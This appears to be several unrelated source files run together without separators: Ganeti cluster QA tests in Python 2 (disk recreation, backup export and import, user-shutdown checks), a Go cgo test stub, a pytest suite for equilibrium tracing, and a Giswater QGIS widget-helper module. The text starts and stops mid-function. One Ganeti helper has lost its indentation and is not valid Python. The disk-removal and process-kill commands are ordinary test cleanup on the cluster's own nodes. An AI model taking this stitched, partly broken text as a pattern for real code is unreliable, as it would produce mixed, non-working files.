                              " skipping test")
    return

  # Currently all supported templates have one primary and one secondary node
  assert len(curr_nodes) == 2
  snode = curr_nodes[1]
  assert len(other_nodes) == 1
  othernode = other_nodes[0]

  options = qa_config.get("options", {})
  use_ialloc = options.get("use-iallocators", True)
  for data in [
    ["-p"],
    ["-s"],
    # A placeholder; the actual command choice depends on use_ialloc
    None,
    # Restore the original secondary
    ["--new-secondary=%s" % snode.primary],
    ]:
    if data is None:
      if use_ialloc:
        data = ["-I", constants.DEFAULT_IALLOCATOR_SHORTCUT]
      else:
        data = ["--new-secondary=%s" % othernode.primary]
    AssertCommand(buildcmd(data))

  AssertCommand(buildcmd(["-a"]))
  AssertCommand(["gnt-instance", "stop", instance.name])
  # "-a" fails while the disks are inactive (instance stopped) ...
  AssertCommand(buildcmd(["-a"]), fail=True)
  # ... and succeeds again once the disks have been activated
  AssertCommand(["gnt-instance", "activate-disks", instance.name])
  AssertCommand(["gnt-instance", "activate-disks", "--wait-for-sync",
                 instance.name])
  AssertCommand(buildcmd(["-a"]))
  AssertCommand(["gnt-instance", "start", instance.name])
def _AssertRecreateDisks(cmdargs, instance, fail=False, check=True,
                         destroy=True):
  """Execute gnt-instance recreate-disks and check the result

  @param cmdargs: Arguments (instance name excluded)
  @param instance: Instance to operate on
  @param fail: True if the command is expected to fail
  @param check: If True and fail is False, check that the disks work
  @param destroy: If True, destroy the old disks first
  """
  if destroy:
    _DestroyInstanceDisks(instance)
  AssertCommand((["gnt-instance", "recreate-disks"] + cmdargs +
                 [instance.name]), fail)
  if not fail and check:
    # Quick check that the disks are there
    AssertCommand(["gnt-instance", "activate-disks", instance.name])
    AssertCommand(["gnt-instance", "activate-disks", "--wait-for-sync",
                   instance.name])
    AssertCommand(["gnt-instance", "deactivate-disks", instance.name])
def _BuildRecreateDisksOpts(en_disks, with_spindles, with_growth,
spindles_supported):
if with_spindles:
if spindles_supported:
if with_growth:
build_spindles_opt = (lambda disk:
",spindles=%s" %
(disk["spindles"] + disk["spindles-growth"]))
else:
build_spindles_opt = (lambda disk:
",spindles=%s" % disk["spindles"])
else:
build_spindles_opt = (lambda _: ",spindles=1")
else:
build_spindles_opt = (lambda _: "")
if with_growth:
build_size_opt = (lambda disk:
"size=%s" % (utils.ParseUnit(disk["size"]) +
utils.ParseUnit(disk["growth"])))
else:
build_size_opt = (lambda disk: "size=%s" % disk["size"])
build_disk_opt = (lambda (idx, disk):
"--disk=%s:%s%s" % (idx, build_size_opt(disk),
build_spindles_opt(disk)))
return map(build_disk_opt, en_disks)
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestRecreateDisks(instance, inodes, othernodes):
  """gnt-instance recreate-disks

  @param instance: Instance to work on
  @param inodes: List of the current nodes of the instance
  @param othernodes: list/tuple of nodes where to temporarily recreate disks
  """
  options = qa_config.get("options", {})
  use_ialloc = options.get("use-iallocators", True)
  other_seq = ":".join([n.primary for n in othernodes])
  orig_seq = ":".join([n.primary for n in inodes])
  # These fail because the instance is running
  _AssertRecreateDisks(["-n", other_seq], instance, fail=True, destroy=False)
  if use_ialloc:
    _AssertRecreateDisks(["-I", "hail"], instance, fail=True, destroy=False)
  else:
    _AssertRecreateDisks(["-n", other_seq], instance, fail=True, destroy=False)
  AssertCommand(["gnt-instance", "stop", instance.name])
  # Disks exist: this should fail
  _AssertRecreateDisks([], instance, fail=True, destroy=False)
  # Unsupported spindles parameters: fail
  if not qa_config.AreSpindlesSupported():
    _AssertRecreateDisks(["--disk=0:spindles=2"], instance,
                         fail=True, destroy=False)
  # Recreate disks in place
  _AssertRecreateDisks([], instance)
  # Move disks away
  if use_ialloc:
    _AssertRecreateDisks(["-I", "hail"], instance)
    # Move disks somewhere else
    _AssertRecreateDisks(["-I", constants.DEFAULT_IALLOCATOR_SHORTCUT],
                         instance)
  else:
    _AssertRecreateDisks(["-n", other_seq], instance)
  # Move disks back
  _AssertRecreateDisks(["-n", orig_seq], instance)
  # Recreate resized disks
  # One of the two commands fails because either spindles are given when they
  # should not or vice versa
  alldisks = qa_config.GetDiskOptions()
  spindles_supported = qa_config.AreSpindlesSupported()
  disk_opts = _BuildRecreateDisksOpts(enumerate(alldisks), True, True,
                                      spindles_supported)
  _AssertRecreateDisks(disk_opts, instance, destroy=True,
                       fail=not spindles_supported)
  disk_opts = _BuildRecreateDisksOpts(enumerate(alldisks), False, True,
                                      spindles_supported)
  _AssertRecreateDisks(disk_opts, instance, destroy=False,
                       fail=spindles_supported)
  # Recreate the disks one by one (with the original size)
  for (idx, disk) in enumerate(alldisks):
    # Only the first call should destroy all the disks
    destroy = (idx == 0)
    # Again, one of the two commands is expected to fail
    disk_opts = _BuildRecreateDisksOpts([(idx, disk)], True, False,
                                        spindles_supported)
    _AssertRecreateDisks(disk_opts, instance, destroy=destroy, check=False,
                         fail=not spindles_supported)
    disk_opts = _BuildRecreateDisksOpts([(idx, disk)], False, False,
                                        spindles_supported)
    _AssertRecreateDisks(disk_opts, instance, destroy=False, check=False,
                         fail=spindles_supported)
  # This and the InstanceCheck decoration check that the disks are working
  AssertCommand(["gnt-instance", "reinstall", "-f", instance.name])
  AssertCommand(["gnt-instance", "start", instance.name])
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceExport(instance, node):
  """gnt-backup export -n ..."""
  name = instance.name
  # Export does not work for file-based templates, thus we skip the test
  file_based = (constants.DT_FILE, constants.DT_SHARED_FILE)
  if instance.disk_template in file_based:
    return None
  AssertCommand(["gnt-backup", "export", "-n", node.primary, name])
  return qa_utils.ResolveInstanceName(name)
@InstanceCheck(None, INST_DOWN, FIRST_ARG)
def TestInstanceExportWithRemove(instance, node):
  """gnt-backup export --remove-instance"""
  # Exporting with --remove-instance leaves the instance removed afterwards
  export_cmd = ["gnt-backup", "export", "-n", node.primary,
                "--remove-instance", instance.name]
  AssertCommand(export_cmd)
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def TestInstanceExportNoTarget(instance):
  """gnt-backup export (without target node, should fail)"""
  export_cmd = ["gnt-backup", "export", instance.name]
  AssertCommand(export_cmd, fail=True)
@InstanceCheck(None, INST_DOWN, FIRST_ARG)
def TestInstanceImport(newinst, node, expnode, name):
  """gnt-backup import

  @param newinst: instance object to import into
  @param node: target node for the imported instance
  @param expnode: node holding the export
  @param name: name of the export (directory under the cluster export dir)
  """
  templ = constants.DT_PLAIN
  if not qa_config.IsTemplateSupported(templ):
    return
  cmd = (["gnt-backup", "import",
          "--disk-template=%s" % templ,
          "--no-ip-check",
          "--src-node=%s" % expnode.primary,
          "--src-dir=%s/%s" % (pathutils.EXPORT_DIR, name),
          "--node=%s" % node.primary] +
         GetGenericAddParameters(newinst, templ,
                                 force_mac=constants.VALUE_GENERATE))
  cmd.append(newinst.name)
  AssertCommand(cmd)
  # Record the disk template the imported instance now uses
  newinst.SetDiskTemplate(templ)
def TestBackupList(expnode):
  """gnt-backup list"""
  AssertCommand(["gnt-backup", "list", "--node=%s" % expnode.primary])

  # Also run the generic query test over all export fields
  export_fields = query.EXPORT_FIELDS.keys()
  qa_utils.GenericQueryTest("gnt-backup", export_fields,
                            namefield=None, test_unknown=False)
def TestBackupListFields():
  """gnt-backup list-fields"""
  export_fields = query.EXPORT_FIELDS.keys()
  qa_utils.GenericQueryFieldsTest("gnt-backup", export_fields)
def TestRemoveInstanceOfflineNode(instance, snode, set_offline, set_online):
  """gnt-instance remove with an off-line node

  @param instance: instance
  @param snode: secondary node, to be set offline
  @param set_offline: function to call to set the node off-line
  @param set_online: function to call to set the node on-line
  """
  info = GetInstanceInfo(instance.name)
  set_offline(snode)
  try:
    TestInstanceRemove(instance)
  finally:
    # Always restore the node, even if the removal test failed
    set_online(snode)

  # Clean up the disks on the offline node, if necessary
  if instance.disk_template not in constants.DTS_EXT_MIRROR:
    # FIXME: abstract the cleanup inside the disks
    if info["storage-type"] == constants.ST_LVM_VG:
      for minor in info["drbd-minors"][snode.primary]:
        # DRBD 8.3 syntax comes first, then DRBD 8.4 syntax. The 8.4 syntax
        # relies on the fact that we always create a resource for each minor,
        # and that this resource is always named resource{minor}.
        # As 'drbdsetup 0 down' does return success (even though that's
        # invalid syntax), we always have to perform both commands and ignore
        # the output.
        drbd_shutdown_cmd = \
          "(drbdsetup %d down >/dev/null 2>&1;" \
          " drbdsetup down resource%d >/dev/null 2>&1) || /bin/true" % \
          (minor, minor)
        AssertCommand(drbd_shutdown_cmd, node=snode)
      AssertCommand(["lvremove", "-f"] + info["volumes"], node=snode)
    elif info["storage-type"] == constants.ST_FILE:
      filestorage = qa_config.get("file-storage-dir",
                                  pathutils.DEFAULT_FILE_STORAGE_DIR)
      disk = os.path.join(filestorage, instance.name)
      AssertCommand(["rm", "-rf", disk], node=snode)
def TestInstanceCreationRestrictedByDiskTemplates():
  """Test adding instances for disabled disk templates."""
  if qa_config.TestEnabled("cluster-exclusive-storage"):
    # These tests are valid only for non-exclusive storage
    return

  enabled_disk_templates = qa_config.GetEnabledDiskTemplates()
  nodes = qa_config.AcquireManyNodes(2)

  # Setup the cluster with the enabled_disk_templates
  AssertCommand(
    ["gnt-cluster", "modify",
     "--enabled-disk-templates=%s" % ",".join(enabled_disk_templates),
     "--ipolicy-disk-templates=%s" % ",".join(enabled_disk_templates)],
    fail=False)

  # Test instance creation for enabled disk templates
  for disk_template in enabled_disk_templates:
    instance = CreateInstanceByDiskTemplate(nodes, disk_template, fail=False)
    TestInstanceRemove(instance)
    instance.Release()

  # Test that instance creation fails for disabled disk templates
  disabled_disk_templates = list(constants.DISK_TEMPLATES
                                 - set(enabled_disk_templates))
  for disk_template in disabled_disk_templates:
    instance = CreateInstanceByDiskTemplate(nodes, disk_template, fail=True)

  # Test instance creation after disabling (a subset of) the enabled
  # disk templates
  if (len(enabled_disk_templates) > 1):
    # Partition the disk templates, enable them separately and check if the
    # disabled ones cannot be used by instances.
    middle = len(enabled_disk_templates) / 2  # Python 2 integer division
    templates1 = enabled_disk_templates[:middle]
    templates2 = enabled_disk_templates[middle:]
    for (enabled, disabled) in [(templates1, templates2),
                                (templates2, templates1)]:
      AssertCommand(["gnt-cluster", "modify",
                     "--enabled-disk-templates=%s" % ",".join(enabled),
                     "--ipolicy-disk-templates=%s" % ",".join(enabled)],
                    fail=False)
      for disk_template in disabled:
        CreateInstanceByDiskTemplate(nodes, disk_template, fail=True)
  elif (len(enabled_disk_templates) == 1):
    # If only one disk template is enabled in the QA config, we have to enable
    # some other templates in order to test if the disabling the only enabled
    # disk template prohibits creating instances of that template.
    other_disk_templates = list(
        set([constants.DT_DISKLESS, constants.DT_BLOCK]) -
        set(enabled_disk_templates))
    AssertCommand(["gnt-cluster", "modify",
                   "--enabled-disk-templates=%s" %
                   ",".join(other_disk_templates),
                   "--ipolicy-disk-templates=%s" %
                   ",".join(other_disk_templates)],
                  fail=False)
    CreateInstanceByDiskTemplate(nodes, enabled_disk_templates[0], fail=True)
  else:
    raise qa_error.Error("Please enable at least one disk template"
                         " in your QA setup.")

  # Restore initially enabled disk templates
  AssertCommand(["gnt-cluster", "modify",
                 "--enabled-disk-templates=%s" %
                 ",".join(enabled_disk_templates),
                 "--ipolicy-disk-templates=%s" %
                 ",".join(enabled_disk_templates)],
                fail=False)
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def _TestInstanceUserDown(instance, master, hv_shutdown_fn):
  """Verify the status transitions around a user-initiated shutdown.

  @param instance: instance to test on
  @param master: master node, used to run the status queries
  @param hv_shutdown_fn: callable shutting the instance down from within
      the hypervisor (bringing it to 'USER_down')
  """
  def _AssertInstanceStatus(expected):
    # Query the instance status on the master and compare with the
    # expectation; factored out of the original six copy-pasted blocks
    cmd = ["gnt-instance", "list", "--no-headers", "-o", "status",
           instance.name]
    result_output = qa_utils.GetCommandOutput(master.primary,
                                              utils.ShellQuoteArgs(cmd))
    AssertEqual(result_output.strip(), expected)

  # Shutdown instance and bring instance status to 'USER_down'
  hv_shutdown_fn()
  _AssertInstanceStatus(constants.INSTST_USERDOWN)

  # Fail to bring instance status to 'running'
  AssertCommand(["gnt-instance", "start", instance.name], fail=True)
  _AssertInstanceStatus(constants.INSTST_USERDOWN)

  # Bring instance status to 'ADMIN_down'
  AssertCommand(["gnt-instance", "shutdown", instance.name])
  _AssertInstanceStatus(constants.INSTST_ADMINDOWN)

  # Bring instance status to 'running'
  AssertCommand(["gnt-instance", "start", instance.name])
  _AssertInstanceStatus(constants.INSTST_RUNNING)

  # Bring instance status to 'ADMIN_down' forcibly
  AssertCommand(["gnt-instance", "shutdown", "-f", instance.name])
  _AssertInstanceStatus(constants.INSTST_ADMINDOWN)

  # Bring instance status to 'running'
  AssertCommand(["gnt-instance", "start", instance.name])
  _AssertInstanceStatus(constants.INSTST_RUNNING)
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def _TestInstanceUserDownXen(instance, master):
  """User-shutdown test for Xen: run "xm shutdown" on the primary node."""
  primary = _GetInstanceField(instance.name, "pnode")

  def _ShutdownViaXm():
    AssertCommand(["xm", "shutdown", "-w", instance.name], node=primary)

  _TestInstanceUserDown(instance, master, _ShutdownViaXm)
@InstanceCheck(INST_UP, INST_UP, FIRST_ARG)
def _TestInstanceUserDownKvm(instance, master):
  """User-shutdown test for KVM: kill the KVM process on the primary node."""
  def _StopKVMInstance():
    # NOTE: "primary" is a closure over the variable bound later in the
    # enclosing scope; it is assigned before this function is invoked
    # via _TestInstanceUserDown
    AssertCommand("pkill -f \"kvm -name %s\"" % instance.name, node=primary)
    # Give the hypervisor time to notice the process is gone
    time.sleep(5)

  AssertCommand(["gnt-instance", "modify", "-H", "user_shutdown=true",
                 instance.name])

  # The instance needs to reboot not because the 'user_shutdown'
  # parameter was modified but because the KVM daemon needs to be
  # started, given that the instance was first created with user
  # shutdown disabled.
  AssertCommand(["gnt-instance", "reboot", instance.name])

  primary = _GetInstanceField(instance.name, "pnode")
  _TestInstanceUserDown(instance, master, _StopKVMInstance)
def TestInstanceUserDown(instance, master):
  """Tests user shutdown with every enabled hypervisor that supports it"""
  enabled_hypervisors = qa_config.GetEnabledHypervisors()

  # (hypervisor, test implementation) pairs
  for (hv, fn) in [(constants.HT_XEN_PVM, _TestInstanceUserDownXen),
                   (constants.HT_XEN_HVM, _TestInstanceUserDownXen),
                   (constants.HT_KVM, _TestInstanceUserDownKvm)]:
    if hv in enabled_hypervisors:
      fn(instance, master)
    else:
      print "%s hypervisor is not enabled, skipping test for this hypervisor" \
        % hv
# Registry of instance-creation tests. Each entry is
# (QA test name, disk template exercised, test function, <int>);
# NOTE(review): the trailing integer is presumably the number of nodes the
# test needs (DRBD requires 2) -- confirm against the consumer of this list.
available_instance_tests = [
  ("instance-add-plain-disk", constants.DT_PLAIN,
   TestInstanceAddWithPlainDisk, 1),
  ("instance-add-drbd-disk", constants.DT_DRBD8,
   TestInstanceAddWithDrbdDisk, 2),
  ("instance-add-diskless", constants.DT_DISKLESS,
   TestInstanceAddDiskless, 1),
  ("instance-add-file", constants.DT_FILE,
   TestInstanceAddFile, 1),
  ("instance-add-shared-file", constants.DT_SHARED_FILE,
   TestInstanceAddSharedFile, 1),
  ]
// Copyright 2020 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
//go:build ignore
package main
/*
typedef struct A A;
typedef struct {
struct A *next;
struct A **prev;
} N;
struct A
{
N n;
};
typedef struct B
{
A* a;
} B;
*/
import "C"
// Go named types based on the C declarations in the preamble above.
type N C.N
type A C.A
type B C.B
"""Test tracing"""
import asyncio
import numpy as np
import pytest
from gameanalysis import gamegen
from gameanalysis import paygame
from gameanalysis import rsgame
from egta import gamesched
from egta import innerloop
from egta import savesched
from egta import asyncgame
from egta import schedgame
from egta import trace
from test import utils # pylint: disable=wrong-import-order
def verify_complete_traces(traces):
    """Verify that traces are in order and complete"""
    # "frontier" is the furthest point in [0, 1] covered so far; each trace
    # must start at or before it, and together they must reach 1.0
    frontier = 0.0
    for trace_times, _ in traces:
        (start, *_, end) = trace_times
        assert start <= frontier
        frontier = max(frontier, end)
    assert frontier == 1.0
# These sometimes take a really long time because of at_least_one and many
# innerloops; the timeout aborts the test after 20 seconds instead.
@pytest.mark.asyncio
@utils.timeout(20)
@pytest.mark.parametrize("base", utils.games())
async def test_random_trace_game(base):
    """Test tracing for random games"""
    # Two random payoff games over the same base game, wrapped as async games
    agame1 = asyncgame.wrap(gamegen.game_replace(base))
    agame2 = asyncgame.wrap(gamegen.game_replace(base))
    traces = await trace.trace_all_equilibria(agame1, agame2, style="one")
    verify_complete_traces(traces)
# These sometimes take a really long time because of at_least_one and many
# innerloops; the timeout aborts the test after 20 seconds instead.
@pytest.mark.asyncio
@utils.timeout(20)
@pytest.mark.parametrize("base", utils.games())
async def test_random_trace_sched(base):
    """Test tracing for random schedulers"""
    # Same as test_random_trace_game, but the games are backed by schedulers
    sched1 = gamesched.gamesched(gamegen.game_replace(base))
    sched2 = gamesched.gamesched(gamegen.game_replace(base))
    traces = await trace.trace_all_equilibria(
        schedgame.schedgame(sched1), schedgame.schedgame(sched2), style="one"
    )
    verify_complete_traces(traces)
@pytest.mark.asyncio
async def test_sparse_trace():
    """Test that tracing sparsely samples profiles"""
    base = rsgame.empty(4, 3)
    # Full games over all profiles with fixed per-strategy payoffs
    game1 = paygame.game_replace(
        base, base.all_profiles(), (base.all_profiles() > 0) * [1, 0, 0]
    )
    game2 = paygame.game_replace(
        base, base.all_profiles(), (base.all_profiles() > 0) * [-0.5, 1.5, 0]
    )
    # Wrap the schedulers so every scheduled profile is recorded
    save1 = savesched.savesched(gamesched.gamesched(game1))
    save2 = savesched.savesched(gamesched.gamesched(game2))

    sgame1 = schedgame.schedgame(save1)
    sgame2 = schedgame.schedgame(save2)
    await asyncio.gather(innerloop.inner_loop(sgame1), innerloop.inner_loop(sgame2))

    # Assert that innerloop doesn't schedule all profiles
    assert save1.get_game().num_profiles == 11
    assert save2.get_game().num_profiles == 11
    ((st1, *_, en1), _), (
        (st2, *_, en2),
        _,
    ) = await trace.trace_all_equilibria(  # pylint: disable=too-many-star-expressions
        sgame1, sgame2
    )

    # Assert that trace found the expected equilibria (ranges over t)
    assert np.isclose(st1, 0)
    assert np.isclose(en1, 1 / 3, atol=1e-3)
    assert np.isclose(st2, 1 / 3, atol=1e-3)
    assert np.isclose(en2, 1)

    # Assert that trace didn't need many extra profiles
    assert save1.get_game().num_profiles == 12
    assert save2.get_game().num_profiles == 12
@pytest.mark.asyncio
async def test_merge_trace():
    """Test that traces are merged"""
    # Two small games differing only in the last payoff entry; presumably
    # their traces overlap so they merge into one -- the assertion below
    # checks exactly one merged trace is returned
    game0 = asyncgame.wrap(
        paygame.game(2, 2, [[2, 0], [1, 1], [0, 2]], [[0, 0], [1, 1], [0, 0]])
    )
    game1 = asyncgame.wrap(
        paygame.game(2, 2, [[2, 0], [1, 1], [0, 2]], [[0, 0], [1, 1], [0, 3]])
    )
    traces = await trace.trace_all_equilibria(game0, game1)
    assert len(traces) == 1
"""
This file is part of Giswater 3
The program is free software: you can redistribute it and/or modify it under the terms of the GNU
General Public License as published by the Free Software Foundation, either version 3 of the License,
or (at your option) any later version.
"""
# -*- coding: utf-8 -*-
""" Module with utility functions to interact with dialog and its widgets """
from qgis.gui import QgsDateTimeEdit
from qgis.PyQt.QtCore import QDate, QDateTime, QSortFilterProxyModel, QStringListModel, QTime, Qt, QRegExp
from qgis.PyQt.QtGui import QPixmap, QDoubleValidator, QRegExpValidator
from qgis.PyQt.QtWidgets import QLineEdit, QComboBox, QWidget, QDoubleSpinBox, QCheckBox, QLabel, QTextEdit, QDateEdit
from qgis.PyQt.QtWidgets import QAbstractItemView, QCompleter, QDateTimeEdit, QTableView, QSpinBox, QTimeEdit
from qgis.PyQt.QtWidgets import QPushButton, QPlainTextEdit, QRadioButton
from functools import partial
import os
import operator
from .actions.HyperLinkLabel import HyperLinkLabel
def fillComboBox(dialog, widget, rows, allow_nulls=True, clear_combo=True):
    """Populate a combo box with one item per row.

    :param dialog: parent dialog used to resolve @widget when given by name
    :param widget: QComboBox instance or its objectName within @dialog
    :param rows: iterable of rows; row[0] is the display text and row[1]
        (when present) is stored as the item's userData
    :param allow_nulls: if True, prepend an empty item
    :param clear_combo: if True, remove existing items first
    """
    if rows is None:
        return
    # The original "type(widget) is str or type(widget) is str" duplicated
    # condition was a Python 2 str/unicode leftover
    if isinstance(widget, str):
        widget = dialog.findChild(QComboBox, widget)
    if clear_combo:
        widget.clear()
    if allow_nulls:
        widget.addItem('')
    for row in rows:
        if len(row) > 1:
            elem = row[0]
            user_data = row[1]
        else:
            elem = row[0]
            user_data = None
        if elem is not None:
            try:
                # Qt expects strings; numbers must be converted explicitly
                if type(elem) is int or type(elem) is float:
                    widget.addItem(str(elem), user_data)
                else:
                    widget.addItem(elem, user_data)
            except Exception:
                # Best-effort fallback: stringify anything Qt rejects
                # (narrowed from the original bare "except:")
                widget.addItem(str(elem), user_data)
def fillComboBoxList(dialog, widget, list_object, allow_nulls=True, clear_combo=True):
    """Populate a combo box from a flat list; every item is stringified.

    :param widget: QComboBox instance or its objectName within @dialog
    :return: None (also when the widget cannot be resolved)
    """
    # Replaces the duplicated "type(widget) is str or type(widget) is str"
    # Python 2 leftover
    if isinstance(widget, str):
        widget = dialog.findChild(QComboBox, widget)
    if widget is None:
        return None
    if clear_combo:
        widget.clear()
    if allow_nulls:
        widget.addItem('')
    for elem in list_object:
        widget.addItem(str(elem))
def getText(dialog, widget, return_string_null=True):
    """Return a widget's textual (or numeric, for spin boxes) value.

    :param return_string_null: if True, empty/unresolved values are returned
        as the literal string "null"; otherwise as ""
    """
    # Replaces the duplicated "type(widget) is str" Python 2 leftover
    if isinstance(widget, str):
        widget = dialog.findChild(QWidget, widget)
    if widget:
        # Guard: previously "text" was unbound (UnboundLocalError) when the
        # widget type matched none of the branches below
        text = None
        # Exact type checks (not isinstance) are kept deliberately: several
        # Qt subclasses need different accessors
        if type(widget) is QLineEdit or type(widget) is QPushButton or type(widget) is QLabel \
                or type(widget) is HyperLinkLabel:
            text = widget.text()
        elif type(widget) is QDoubleSpinBox or type(widget) is QSpinBox:
            text = widget.value()
        elif type(widget) is QTextEdit:
            text = widget.toPlainText()
        if text:
            elem_text = text
        elif return_string_null:
            elem_text = "null"
        else:
            elem_text = ""
    else:
        elem_text = "null" if return_string_null else ""
    return elem_text
def setText(dialog, widget, text):
    """Set a widget's textual or numeric value.

    'None' is shown as an empty string; spin boxes treat None/null as 0.
    """
    # Replaces the duplicated "type(widget) is str" Python 2 leftover
    if isinstance(widget, str):
        widget = dialog.findChild(QWidget, widget)
    if not widget:
        return

    value = str(text)
    if type(widget) is QLineEdit or type(widget) is QTextEdit or type(widget) is QLabel:
        if value == 'None':
            value = ""
        widget.setText(value)
    elif type(widget) is QPlainTextEdit:
        if value == 'None':
            value = ""
        widget.insertPlainText(value)
    elif type(widget) is QDoubleSpinBox or type(widget) is QSpinBox:
        # Spin boxes need a number; map the textual null markers to zero
        if value in ('None', 'null'):
            value = 0
        widget.setValue(float(value))
def getCalendarDate(dialog, widget, date_format="yyyy/MM/dd", datetime_format="yyyy/MM/dd hh:mm:ss"):
    """Return the date (or datetime) shown by a calendar-style widget.

    :return: formatted string, or None when the widget type or its display
        format is not handled
    """
    date = None
    # Replaces the duplicated "type(widget) is str" Python 2 leftover
    if isinstance(widget, str):
        widget = dialog.findChild(QWidget, widget)
    if not widget:
        return

    # QgsDateTimeEdit subclasses QDateTimeEdit, hence the exact type checks:
    # it is told apart by its display format (date-only vs date+time)
    if type(widget) is QDateEdit:
        date = widget.date().toString(date_format)
    elif type(widget) is QDateTimeEdit:
        date = widget.dateTime().toString(datetime_format)
    elif type(widget) is QgsDateTimeEdit and widget.displayFormat() in ('dd/MM/yyyy', 'yyyy/MM/dd'):
        date = widget.dateTime().toString(date_format)
    elif type(widget) is QgsDateTimeEdit and widget.displayFormat() in ('dd/MM/yyyy hh:mm:ss', 'yyyy/MM/dd hh:mm:ss'):
        date = widget.dateTime().toString(datetime_format)
    return date
def setCalendarDate(dialog, widget, date, default_current_date=True):
    """Set the date (or datetime) of a calendar-style widget.

    :param date: QDate/QDateTime to set; None selects a default (the current
        date/time, or 01/01/2000 when @default_current_date is False)
    """
    # Replaces the duplicated "type(widget) is str" Python 2 leftover
    if isinstance(widget, str):
        widget = dialog.findChild(QWidget, widget)
    if not widget:
        return

    # QgsDateTimeEdit subclasses QDateTimeEdit; its display format decides
    # whether it behaves as a date-only or a date+time editor
    if type(widget) is QDateEdit \
            or (type(widget) is QgsDateTimeEdit and widget.displayFormat() in ('dd/MM/yyyy', 'yyyy/MM/dd')):
        if date is None:
            if default_current_date:
                date = QDate.currentDate()
            else:
                date = QDate.fromString('01/01/2000', 'dd/MM/yyyy')
        widget.setDate(date)
    elif type(widget) is QDateTimeEdit \
            or (type(widget) is QgsDateTimeEdit and widget.displayFormat() in ('dd/MM/yyyy hh:mm:ss', 'yyyy/MM/dd hh:mm:ss')):
        if date is None:
            date = QDateTime.currentDateTime()
        widget.setDateTime(date)
def setTimeEdit(dialog, widget, time):
    """ Set @time on a QTimeEdit (00:00:00 when @time is None). """
    if isinstance(widget, str):
        widget = dialog.findChild(QWidget, widget)
    if not widget:
        return
    if type(widget) is QTimeEdit:
        if time is None:
            time = QTime(00, 00, 00)
        widget.setTime(time)
def getWidget(dialog, widget):
    """ Resolve @widget (a widget or an objectName) to a widget, or None. """
    if isinstance(widget, str):
        widget = dialog.findChild(QWidget, widget)
    if not widget:
        return None
    return widget
def getWidgetType(dialog, widget):
    """ Return the concrete type of @widget (resolved by name if needed), or None. """
    if isinstance(widget, str):
        widget = dialog.findChild(QWidget, widget)
    if not widget:
        return None
    return type(widget)
def getWidgetText(dialog, widget, add_quote=False, return_string_null=True):
    """ Return the text of a text-like widget or the selection of a combobox.

    :param add_quote: wrap the result in single quotes unless it is "null"
    :param return_string_null: forwarded to getText/getSelectedItem
    :returns: the text, or None for missing/unsupported widgets
    """
    if isinstance(widget, str):
        widget = dialog.findChild(QWidget, widget)
    if not widget:
        return None
    text = None
    if type(widget) in (QLineEdit, QTextEdit, QLabel, HyperLinkLabel, QSpinBox, QDoubleSpinBox, QPushButton):
        text = getText(dialog, widget, return_string_null)
    elif type(widget) is QComboBox:
        text = getSelectedItem(dialog, widget, return_string_null)
    if add_quote and text != "null":
        text = "'" + text + "'"
    return text
def setWidgetText(dialog, widget, text):
    """ Dispatch @text to the appropriate setter for the widget's type. """
    if isinstance(widget, str):
        widget = dialog.findChild(QWidget, widget)
    if not widget:
        return
    if type(widget) in (QLineEdit, QTextEdit, QTimeEdit, QLabel, QPlainTextEdit,
                        QDoubleSpinBox, QSpinBox):
        setText(dialog, widget, text)
    elif type(widget) is QComboBox:
        setSelectedItem(dialog, widget, text)
    elif type(widget) is QCheckBox:
        setChecked(dialog, widget, text)
def isChecked(dialog, widget):
    """ Return the checked state of a QCheckBox; False when not found. """
    if isinstance(widget, str):
        widget = dialog.findChild(QCheckBox, widget)
    return widget.isChecked() if widget else False
def setChecked(dialog, widget, checked=True):
    """ Check/uncheck a QCheckBox or QRadioButton.

    Accepts booleans or the strings 'true'/'t'/'True' and 'false'/'f'/'False'
    (typically coming straight from a database value).
    """
    if str(checked) in ('true', 't', 'True'):
        checked = True
    elif str(checked) in ('false', 'f', 'False'):
        checked = False
    if isinstance(widget, str):
        widget = dialog.findChild(QWidget, widget)
    if not widget:
        return
    if type(widget) in (QCheckBox, QRadioButton):
        widget.setChecked(bool(checked))
def getSelectedItem(dialog, widget, return_string_null=True):
    """ Return the current text of a QComboBox.

    Falls back to "null" (or "" when @return_string_null is False) for a
    missing widget or an empty selection.
    """
    if isinstance(widget, str):
        widget = dialog.findChild(QComboBox, widget)
    fallback = "null" if return_string_null else ""
    if widget and widget.currentText():
        return widget.currentText()
    return fallback
def setSelectedItem(dialog, widget, text):
    """ Select the combobox entry matching @text (first entry when absent). """
    if isinstance(widget, str):
        widget = dialog.findChild(QComboBox, widget)
    if widget:
        index = widget.findText(text)
        widget.setCurrentIndex(index if index != -1 else 0)
def setCurrentIndex(dialog, widget, index):
    """ Set the current index of a QComboBox; -1 is mapped to 0. """
    if isinstance(widget, str):
        widget = dialog.findChild(QComboBox, widget)
    if widget:
        # stray trailing semicolon removed from the original call
        widget.setCurrentIndex(index if index != -1 else 0)
def setWidgetVisible(dialog, widget, visible=True):
    """ Show/hide @widget (resolved by name if needed). """
    if isinstance(widget, str):
        widget = dialog.findChild(QWidget, widget)
    if widget:
        widget.setVisible(visible)
def setWidgetEnabled(dialog, widget, enabled=True):
    """ Enable/disable @widget (resolved by name if needed). """
    if isinstance(widget, str):
        widget = dialog.findChild(QWidget, widget)
    if widget:
        widget.setEnabled(enabled)
def setImage(dialog, widget, cat_shape):
    """ Set pictures for UD: load png/<cat_shape> (lowercased) from the plugin
    folder into a QLabel. """
    element = cat_shape.lower()
    if isinstance(widget, str):
        widget = dialog.findChild(QWidget, widget)
    if not widget:
        return
    if type(widget) is QLabel:
        plugin_dir = os.path.dirname(__file__)
        # ''+element+'' was a no-op concatenation
        pic_file = os.path.join(plugin_dir, 'png', element)
        widget.setPixmap(QPixmap(pic_file))
        widget.show()
def fillWidget(dialog, widget, row):
    """ Fill @widget from row[widget.objectName()].

    A missing key or a None value clears the widget; a real value is only
    written for QLineEdit/QTextEdit (original behavior preserved).
    """
    if isinstance(widget, str):
        widget = dialog.findChild(QWidget, widget)
    if not widget:
        return
    key = widget.objectName()
    # both "key absent" and "value is None" cleared the widget in the original
    if key not in row or row[key] is None:
        widget.setText("")
        return
    value = str(row[key])
    if type(widget) in (QLineEdit, QTextEdit):
        if value == 'None':
            value = ""
